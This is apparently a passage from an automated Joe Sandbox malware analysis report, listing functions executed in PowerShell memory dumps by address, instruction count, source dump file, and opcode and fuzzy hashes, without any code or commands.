                                      Function 00007FFD9BA29960 Relevance: .0, Instructions: 37COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1944338278.00007FFD9BA20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_7ffd9ba20000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 302df73167b7425a4f5e93efc0cffef5a8b463caa3932cf0353d88215da23506
                                      • Instruction ID: 85e4e9861943c093ded92a242e2b7889cf41c0fa6e53a101d234ab54ce293cc8
                                      • Opcode Fuzzy Hash: 302df73167b7425a4f5e93efc0cffef5a8b463caa3932cf0353d88215da23506
                                      • Instruction Fuzzy Hash: 4FF0243084968D8FDB16DF28885A9D87FA0FF26250B0502EBE459C70B2DF64E558CBC2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFD9BAF3790 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1944993185.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_7ffd9baf0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bfb8a687247907061feb8e821834dd08e8a0ed842ae0f6779f8ae334d54e3d77
                                      • Instruction ID: e694e7c2954019d3681c0fb8563eff3d8a892771c29d99d7ef3346148199700e
                                      • Opcode Fuzzy Hash: bfb8a687247907061feb8e821834dd08e8a0ed842ae0f6779f8ae334d54e3d77
                                      • Instruction Fuzzy Hash: 7AF05E72B0E6498FDB68EB5CE4558E877F0EF4532071500BAE199CB5A3DA25AC44C740
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Executed Functions

                                      Function 00007FFD9B8DF360 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.2113569732.00007FFD9B8DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8DD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_7ffd9b8dd000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: vd9a
                                      • API String ID: 0-352296916
                                      • Opcode ID: 59648417f90b9f86bab50f7850b18290b7986f25a95deee3e6c4b78937343bd5
                                      • Instruction ID: 338dee081f99e4f44a6197c0a0d665a5ea5eb91d4ea9e5c415a44249a8edbd08
                                      • Opcode Fuzzy Hash: 59648417f90b9f86bab50f7850b18290b7986f25a95deee3e6c4b78937343bd5
                                      • Instruction Fuzzy Hash: A1410B7150EBC44FD7568B2998555623FF0EF56324F0A02EFD088CB1A7D625A849C792
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFD9B9FB708 Relevance: .1, Instructions: 101COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.2114947371.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_7ffd9b9f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ace62c6c079aeaf6223cdc34d281ba16fb6afa46b1e362c12f128636bfe7c102
                                      • Instruction ID: 0710aa3753f288e52f4e2a56647735c217ef712e1c9d4a7ad28f369c9453cbf8
                                      • Opcode Fuzzy Hash: ace62c6c079aeaf6223cdc34d281ba16fb6afa46b1e362c12f128636bfe7c102
                                      • Instruction Fuzzy Hash: 53212730A1CA4C5FDB68DF6C984A6FA7FE0EB96331F04426FD099C31A2CA615417CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFD9B9F33B5 Relevance: .0, Instructions: 49COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.2114947371.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_7ffd9b9f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: de71d5dc2b163faadf90bb215209a43f2a279f81d72915627df212f3e4bcae5c
                                      • Instruction ID: 4dd6f5e87c23be5727fba137d59d1ad777011c451dbc05b8ab661a33166cf41a
                                      • Opcode Fuzzy Hash: de71d5dc2b163faadf90bb215209a43f2a279f81d72915627df212f3e4bcae5c
                                      • Instruction Fuzzy Hash: B501677121CB0C4FD748EF0CE451AA5B7E0FB95364F50056DE58AC36A5DB36E882CB45
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFD9B9FB548 Relevance: .0, Instructions: 41COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.2114947371.00007FFD9B9F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_7ffd9b9f0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 89a9c9ffe3d8d5f454a2335769d606e9da98a228eb1686d1a5887e738010d67f
                                      • Instruction ID: d7c0ca7d587db252917848c65fac1a5059cfb8d8a40a4b8f3e48b3ea1d0ca62d
                                      • Opcode Fuzzy Hash: 89a9c9ffe3d8d5f454a2335769d606e9da98a228eb1686d1a5887e738010d67f
                                      • Instruction Fuzzy Hash: D8F0243080968D8FDB06DF6888259D57FA0FF26311B0502DBE499C70B2DB64A958CB82
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFD9BAC4BED Relevance: .0, Instructions: 37COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.2116425894.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_7ffd9bac0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 599e7dc46984f4b0f3bb3d81aded0f8a7ab9e02f20c86b5b45222dee8a49151a
                                      • Instruction ID: 5790395c6f05c08bc1148d907b4bce5d77c87dc75bc755a6bb68a9d670f5c761
                                      • Opcode Fuzzy Hash: 599e7dc46984f4b0f3bb3d81aded0f8a7ab9e02f20c86b5b45222dee8a49151a
                                      • Instruction Fuzzy Hash: ADF0BE32B0E9098FD768EB4CE4508A873E0EF4532171500BAE16DC70B3CE25EC41C744
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFD9BAC3474 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.2116425894.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_7ffd9bac0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7bdba02c7e628f4a9a661f6fab6512ae4f2c857544abd9bb082f0772f0146ffc
                                      • Instruction ID: 2a1327943da338f03d68446b40c0e01b3d1e7789bad425c8e456d35f0c4f1000
                                      • Opcode Fuzzy Hash: 7bdba02c7e628f4a9a661f6fab6512ae4f2c857544abd9bb082f0772f0146ffc
                                      • Instruction Fuzzy Hash: 6AF0A03131CF044FE748EF2DE449AA2B7E0FBA8350F10462FE44AC3291DA21E8818782
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFD9BAC4EA0 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.2116425894.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_7ffd9bac0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 25d6593027ae86ddf41b4a08b17c92aaed793fed63df4aa2fdd5b0662d0c1d98
                                      • Instruction ID: 8df0eda47c37b01401b414514872dfa4a5f2f5132ce7423da8ccae1ac260bddb
                                      • Opcode Fuzzy Hash: 25d6593027ae86ddf41b4a08b17c92aaed793fed63df4aa2fdd5b0662d0c1d98
                                      • Instruction Fuzzy Hash: D3F05E32B0E9498FDB69EB5CE4918E877E0FF4532071600BAE169CB4B3CB25AD54C744
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Executed Functions

                                      Function 00007FFD9B9E9B04 Relevance: .4, Instructions: 367COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000018.00000002.2571782572.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_24_2_7ffd9b9e0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c8eb99624c6c29df798b07c8bc3aa444dd4b9103ac5a88bf6e9da6d5bbc8b506
                                      • Instruction ID: 474aa3dbb689e1376372b1b1a2b875b7fc79ca5fc4bab7dc828a12b3445d5d97
                                      • Opcode Fuzzy Hash: c8eb99624c6c29df798b07c8bc3aa444dd4b9103ac5a88bf6e9da6d5bbc8b506
                                      • Instruction Fuzzy Hash: 3611276591F7C89FD7579B388C781987FB0EF63204B0A01DBD489CB0B3E6295A48C792
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFD9B9E97E0 Relevance: .2, Instructions: 244COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000018.00000002.2571782572.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_24_2_7ffd9b9e0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86a8724d1da9c6bdbbc48f9efe85fd5fb59509ee473a880996c494e6bb569202
                                      • Instruction ID: ed68938d3d9101573ae1720e3ac611c92709c2cfbe7619f1592c1dbf07eef89a
                                      • Opcode Fuzzy Hash: 86a8724d1da9c6bdbbc48f9efe85fd5fb59509ee473a880996c494e6bb569202
                                      • Instruction Fuzzy Hash: C611C67181E7C99FD723DB684C295A87FB0EF13214B0901DBD089C70F3DA646A48C792
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFD9B9E9102 Relevance: .1, Instructions: 129COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000018.00000002.2571782572.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_24_2_7ffd9b9e0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6e88df8c5c518cd444d5c10b2511be9e88abfc93057ce13decfeb3f3e2b9666e
                                      • Instruction ID: 9362c7af8424631a0c9f3fbcc4f8d7907112f2c280b078f065ae15bdec965e4b
                                      • Opcode Fuzzy Hash: 6e88df8c5c518cd444d5c10b2511be9e88abfc93057ce13decfeb3f3e2b9666e
                                      • Instruction Fuzzy Hash: 1F31E530A1CB4C9FDB589B5C980A6B97BE0FB99320F04426FE449C3252DB71A955CBC2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFD9B8CEE20 Relevance: .1, Instructions: 125COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000018.00000002.2569235425.00007FFD9B8CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_24_2_7ffd9b8cd000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7dc5ea14d9b1eb03f82463d732566dc7aac804936b3e925793bbbb1d80f6ba8f
                                      • Instruction ID: 03f5b2a97480109a57ae0d8bceecdc1242f3f2bb68b3da0c64bb90f01c9f8754
                                      • Opcode Fuzzy Hash: 7dc5ea14d9b1eb03f82463d732566dc7aac804936b3e925793bbbb1d80f6ba8f
                                      • Instruction Fuzzy Hash: 5241287040DBC84FD7569B399855A623FF0EF56321F0605EFD088CB5A3D725A845C792
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFD9B9E9F7C Relevance: .1, Instructions: 84COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000018.00000002.2571782572.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_24_2_7ffd9b9e0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d69352829493ce6e0f42a7b542b3bc695712cca4e758ba17095b8278ef85df85
                                      • Instruction ID: a608f6aab5ce3b2051fb20fc7ace67b0397e7218ed935b1e32cc3c9529822935
                                      • Opcode Fuzzy Hash: d69352829493ce6e0f42a7b542b3bc695712cca4e758ba17095b8278ef85df85
                                      • Instruction Fuzzy Hash: DA21C631A0CA4C8FDB58DF9C98497F97BE0EBA5321F00412FD44DC3255D671A555CB81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFD9B9E33B5 Relevance: .0, Instructions: 49COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000018.00000002.2571782572.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_24_2_7ffd9b9e0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 416d78af615282d572b3a414326c95b602a4a0825e38525b723d7405b764b34a
                                      • Instruction ID: 8a6e8001562b2abbc7a2c8ed2e38cf26b8702174858b576a1598873712e5204a
                                      • Opcode Fuzzy Hash: 416d78af615282d572b3a414326c95b602a4a0825e38525b723d7405b764b34a
                                      • Instruction Fuzzy Hash: 1601A73021CB0C4FD748EF0CE051AA5B3E0FB85324F10056DE58AC36A5DB32E882CB41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFD9BAB32C2 Relevance: .0, Instructions: 39COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000018.00000002.2573942227.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_24_2_7ffd9bab0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 117bd3e48c6e115394d52852a4eedc03f66900c21a158c8b3a2be2ccc6f134dc
                                      • Instruction ID: 07a08f3e1a9427f99614491d27d7756f3bfa745716be0c3d3f0eb4fceaf04ee6
                                      • Opcode Fuzzy Hash: 117bd3e48c6e115394d52852a4eedc03f66900c21a158c8b3a2be2ccc6f134dc
                                      • Instruction Fuzzy Hash: 89F0BE32B0E5598FDB68EB4CE4528A873E0FF45320B1900BBE16DC74B7CA26AC45CB40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFD9BAB3570 Relevance: .0, Instructions: 35COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000018.00000002.2573942227.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_24_2_7ffd9bab0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5defbeca12d20ede33c95a6cada584bfd7bc952f540787e70d10cde1184fa2c9
                                      • Instruction ID: a5d878da8ff5418cc6afb3d1501d1a0e6038c02f3be64c2e438240bc95799e42
                                      • Opcode Fuzzy Hash: 5defbeca12d20ede33c95a6cada584bfd7bc952f540787e70d10cde1184fa2c9
                                      • Instruction Fuzzy Hash: 46F05832B0E5598FDB68EB9CE4518A877E0FF45320B1500BBE169CB4A7CA26AC44CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00007FFD9B9E9DB8 Relevance: .0, Instructions: 25COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000018.00000002.2571782572.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_24_2_7ffd9b9e0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0b18cf9ce4dca279a02ecaef5c7ee3b79a14f4e84683d8dafefa5178621ec3d1
                                      • Instruction ID: f5d4d6b5ccd90e2caa277d69751bea3478a4adb4dafc4ecddc9810e0a87162e8
                                      • Opcode Fuzzy Hash: 0b18cf9ce4dca279a02ecaef5c7ee3b79a14f4e84683d8dafefa5178621ec3d1
                                      • Instruction Fuzzy Hash: 6AE04F30410A4C8FCB44EF28D809AE5BBE0FB28305F01029BF41DD7160DB309A58CBC2
                                      Uniqueness

                                      Uniqueness Score: -1.00%